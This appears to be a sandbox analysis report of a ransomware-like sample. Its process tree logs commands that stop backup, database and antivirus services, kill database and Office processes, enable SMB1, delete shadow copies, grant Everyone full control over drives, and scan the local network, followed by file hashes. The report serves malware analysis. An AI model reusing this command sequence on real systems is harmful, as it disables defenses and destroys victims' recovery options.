C:\Windows\system32\net.exe"net.exe" stop SQLAgent$PRACTTICEBGC /y2⤵PID:4020
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y3⤵PID:3108
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamCatalogSvc /y2⤵PID:4012
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamCatalogSvc /y3⤵PID:6604
-
-
-
C:\Windows\system32\net.exe"net.exe" stop klnagent /y2⤵PID:4004
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop klnagent /y3⤵PID:2580
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SepMasterService /y2⤵PID:4028
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SepMasterService /y3⤵PID:7144
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$SQL_2008 /y2⤵PID:3996
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y3⤵PID:6600
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamBrokerSvc /y2⤵PID:3988
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBrokerSvc /y3⤵PID:2488
-
-
-
C:\Windows\system32\net.exe"net.exe" stop kavfsslp /y2⤵PID:3980
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop kavfsslp /y3⤵PID:6384
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$PRACTTICEMGT /y2⤵PID:4036
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y3⤵PID:6668
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$SHAREPOINT /y2⤵PID:3972
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y3⤵PID:6968
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$BKUPEXEC /y2⤵PID:3964
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y3⤵PID:5116
-
-
-
C:\Windows\system32\net.exe"net.exe" stop sms_site_sql_backup /y2⤵PID:3956
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sms_site_sql_backup /y3⤵PID:3756
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ShMonitor /y2⤵PID:4044
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ShMonitor /y3⤵PID:5644
-
-
-
C:\Windows\system32\net.exe"net.exe" stop mfevtp /y2⤵PID:3948
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfevtp /y3⤵PID:2356
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3940
-
-
C:\Windows\system32\net.exe"net.exe" stop veeam /y2⤵PID:3932
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop veeam /y3⤵PID:4456
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$PROD /y2⤵PID:4052
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROD /y3⤵PID:6320
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamBackupSvc /y2⤵PID:3924
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBackupSvc /y3⤵PID:2156
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵PID:3916
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵PID:3596
-
-
-
C:\Windows\system32\net.exe"net.exe" stop Smcinst /y2⤵PID:4060
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Smcinst /y3⤵PID:5292
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$PROFXENGAGEMENT /y2⤵PID:4068
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y3⤵PID:1680
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SmcService /y2⤵PID:4076
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SmcService /y3⤵PID:3728
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$PROD /y2⤵PID:4376
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PROD /y3⤵PID:1404
-
-
-
C:\Windows\system32\net.exe"net.exe" stop AcronisAgent /y2⤵PID:4384
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵PID:2864
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecJobEngine /y2⤵PID:4368
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵PID:3644
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Web Control Service” /y2⤵PID:4360
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Web Control Service” /y3⤵PID:2644
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$PRACTTICEBGC /y2⤵PID:4352
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y3⤵PID:5100
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecDeviceMediaService /y2⤵PID:4344
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDeviceMediaService /y3⤵PID:3364
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos System Protection Service” /y2⤵PID:4336
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos System Protection Service” /y3⤵PID:3236
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$PRACTICEMGT /y2⤵PID:4328
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y3⤵PID:2204
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵PID:4320
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵PID:2852
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Safestore Service” /y2⤵PID:4312
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Safestore Service” /y3⤵PID:4932
-
-
-
C:\Windows\system32\net.exe"net.exe" stop audioendpointbuilder /y2⤵PID:4304
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop audioendpointbuilder /y3⤵PID:4996
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$ECWDB2 /y2⤵PID:4296
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$ECWDB2 /y3⤵PID:3764
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵PID:4280
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵PID:3816
-
-
-
C:\Windows\system32\net.exe"net.exe" stop AVP /y2⤵PID:4272
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AVP /y3⤵PID:6968
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SBSMONITORING /y2⤵PID:4264
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y3⤵PID:2840
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SBSMONITORING /2⤵PID:4256
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /3⤵PID:7068
-
-
-
C:\Windows\system32\net.exe"net.exe" stop vapiendpoint /y2⤵PID:4248
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop vapiendpoint /y3⤵PID:3476
-
-
-
C:\Windows\system32\net.exe"net.exe" stop mssql$vim_sqlexp /y2⤵PID:4240
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mssql$vim_sqlexp /y3⤵PID:5000
-
-
-
C:\Windows\system32\net.exe"net.exe" stop WRSVC /y2⤵PID:4232
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WRSVC /y3⤵PID:2252
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLTELEMETRY$ECWDB2 /y2⤵PID:4224
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y3⤵PID:4776
-
-
-
C:\Windows\system32\net.exe"net.exe" stop TrueKeyServiceHelper /y2⤵PID:4216
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKeyServiceHelper /y3⤵PID:4660
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLTELEMETRY /y2⤵PID:4208
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY /y3⤵PID:4424
-
-
-
C:\Windows\system32\net.exe"net.exe" stop TrueKeyScheduler /y2⤵PID:4200
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKeyScheduler /y3⤵PID:4400
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLSERVERAGENT /y2⤵PID:4192
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSERVERAGENT /y3⤵PID:4568
-
-
-
C:\Windows\system32\net.exe"net.exe" stop TrueKey /y2⤵PID:4184
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKey /y3⤵PID:3348
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLSafeOLRService /y2⤵PID:4176
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSafeOLRService /y3⤵PID:3972
-
-
-
C:\Windows\system32\net.exe"net.exe" stop tmlisten /y2⤵PID:4168
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop tmlisten /y3⤵PID:6724
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLBrowser /y2⤵PID:4160
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLBrowser /y3⤵PID:3324
-
-
-
C:\Windows\system32\net.exe"net.exe" stop TmCCSF /y2⤵PID:4152
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TmCCSF /y3⤵PID:3080
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2012 /y2⤵PID:4144
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y3⤵PID:2912
-
-
-
C:\Windows\system32\net.exe"net.exe" stop swi_update_64 /y2⤵PID:4136
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_update_64 /y3⤵PID:4460
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y2⤵PID:4128
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y3⤵PID:3748
-
-
-
C:\Windows\system32\net.exe"net.exe" stop swi_update /y2⤵PID:4120
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_update /y3⤵PID:6568
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$TPSAMA /y2⤵PID:4112
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPSAMA /y3⤵PID:4876
-
-
-
C:\Windows\system32\net.exe"net.exe" stop swi_service /y2⤵PID:4104
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_service /y3⤵PID:4768
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$TPS /y2⤵PID:3524
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPS /y3⤵PID:1980
-
-
-
C:\Windows\system32\net.exe"net.exe" stop swi_filter /y2⤵PID:3484
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_filter /y3⤵PID:3340
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SYSTEM_BGC /y2⤵PID:3448
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y3⤵PID:4712
-
-
-
C:\Windows\system32\net.exe"net.exe" stop svcGenericHost /y2⤵PID:3420
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop svcGenericHost /y3⤵PID:6564
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SQLEXPRESS /y2⤵PID:3384
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y3⤵PID:2560
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SOPHOS /y2⤵PID:3044
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SOPHOS /y3⤵PID:6584
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SQL_2008 /y2⤵PID:1344
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y3⤵PID:3780
-
-
-
C:\Windows\system32\net.exe"net.exe" stop sophossps /y2⤵PID:1704
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophossps /y3⤵PID:3980
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SHAREPOINT /y2⤵PID:2132
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y3⤵PID:7048
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SntpService /y2⤵PID:4092
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SntpService /y3⤵PID:3868
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SBSMONITORING /y2⤵PID:4084
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y3⤵PID:6296
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecManagementService /y2⤵PID:5476
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵PID:3204
-
-
-
C:\Windows\system32\net.exe"net.exe" stop PDVFSService /y2⤵PID:4796
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵PID:3540
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SHAREPOINT /y2⤵PID:3768
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y3⤵PID:4288
-
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c net view2⤵PID:3872
-
C:\Windows\system32\net.exenet view3⤵
- Discovers systems in the same network
PID:2248
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SOPHOS /y2⤵PID:5132
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SOPHOS /y3⤵PID:2128
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$PROFXENGAGEMENT /y2⤵PID:5752
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y3⤵PID:3504
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵PID:5780
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵PID:6312
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵PID:5220
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵PID:3700
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecRPCService /y2⤵PID:5404
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵PID:3292
-
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5728
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2104
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2260
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2688
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2512
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4668
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2504
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM rphost.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3720
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM rmngr.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:696
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ragent.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2308
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2672
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2076
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5036
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2592
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2544
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5040
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4884
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1600
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2292
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4968
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4940
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2564
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:440
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2476
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2528
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2428
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3860
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3864
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4408
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4412
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3052
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2112
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵
- Kills process with taskkill
PID:2316
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2468
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1072
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4416
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3892
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1584
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1744
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2224
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2172
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3624
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1264
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5668
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:908
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5616
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5624
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5588
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5500
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5524
-
-
C:\Windows\system32\net.exe"net.exe" stop Antivirus /y2⤵PID:5324
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Antivirus /y3⤵PID:2960
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SAVService /y2⤵PID:1224
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVService /y3⤵PID:4808
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$ECWDB2 /y2⤵PID:5876
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y3⤵PID:3156
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SAVAdminService /y2⤵PID:5272
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVAdminService /y3⤵PID:7136
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$CXDB /y2⤵PID:5900
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$CXDB /y3⤵PID:3332
-
-
-
C:\Windows\system32\net.exe"net.exe" stop sacsvr /y2⤵PID:5124
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sacsvr /y3⤵PID:6700
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$CITRIX_METAFRAME /y2⤵PID:5156
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y3⤵PID:4452
-
-
-
C:\Windows\system32\net.exe"net.exe" stop DCAgent /y2⤵PID:5636
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DCAgent /y3⤵PID:2940
-
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM 1cv8.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3692
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sql.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5104
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2440
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM oracle.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2396
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2416
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysql.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1096
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqld.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1656
-
-
C:\Windows\system32\icacls.exe"icacls" "C:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:1080
-
-
C:\Windows\system32\icacls.exe"icacls" "Z:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:2808
-
-
C:\Windows\system32\icacls.exe"icacls" "D:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:4448
-
-
C:\Windows\system32\arp.exe"arp" -a2⤵PID:6548
-
-
C:\Windows\system32\net.exe"net.exe" use \\10.127.0.852⤵PID:6656
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp462C.bat2⤵PID:7084
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:5340
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD56cfe243ef92e30a7e49fd95e22f3f956
SHA1aac02fc078b4a67a0aea9283fc4afadb37286a85
SHA2562b791cdb4e20765df6a7e4a2aa9ec80488c4f40a69e0edfc6d9cddbddc520e46
SHA512bceaaf61c937a7dc98ce3b3531a3a72f1ef13fc572c8e6583b7199508ef1ee381a4849159800386d5e2f9523a6e5f50709cd159fb39edef4deaee543019ae0f8
-
MD5
18126be163eb7df2194bb902c359ba8e
SHA16c79d9ca8bf0a3b5f04d317165f48d4eedd04d40
SHA256a9affdcdb398d437e2e1cd9bc1ccf2d101d79fc6d87e95e960e50847a141faa4
SHA5124a692579afd1536f70b6ded199d05b1e40d70cb0eae7511f2965f88cc5b024bc55c3a7b3dc90d9b88971f1cd562bb93827707d1cf3c7772fa669632bac2cf1f5
-
MD5
82f7009f8e51bd9604e347c4962758b9
SHA13df34bb553d787d4b433beb74c48a389b309b892
SHA25658c7fc0de76bf6a12bbe2fb2b38a15c29745533344c3b705abe79fb0b97f62e9
SHA512c15c9cd686ebf7407e815f70e42d854feba3e20ea9def339a0e4236678b73cf89a69a501ea7eab70094375af0232b88698211123dc76cb0d650e0174b250960c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD51d12c1f025dbd2a7438a1e73102ab6aa
SHA19f8cdb35a3df7a146ecd448e74379d2531acdfa2
SHA256b4b3626b5a6c9fabb0c9227bfbbad1c8ea6c8123d59eb57f5a2ec0a308d813f3
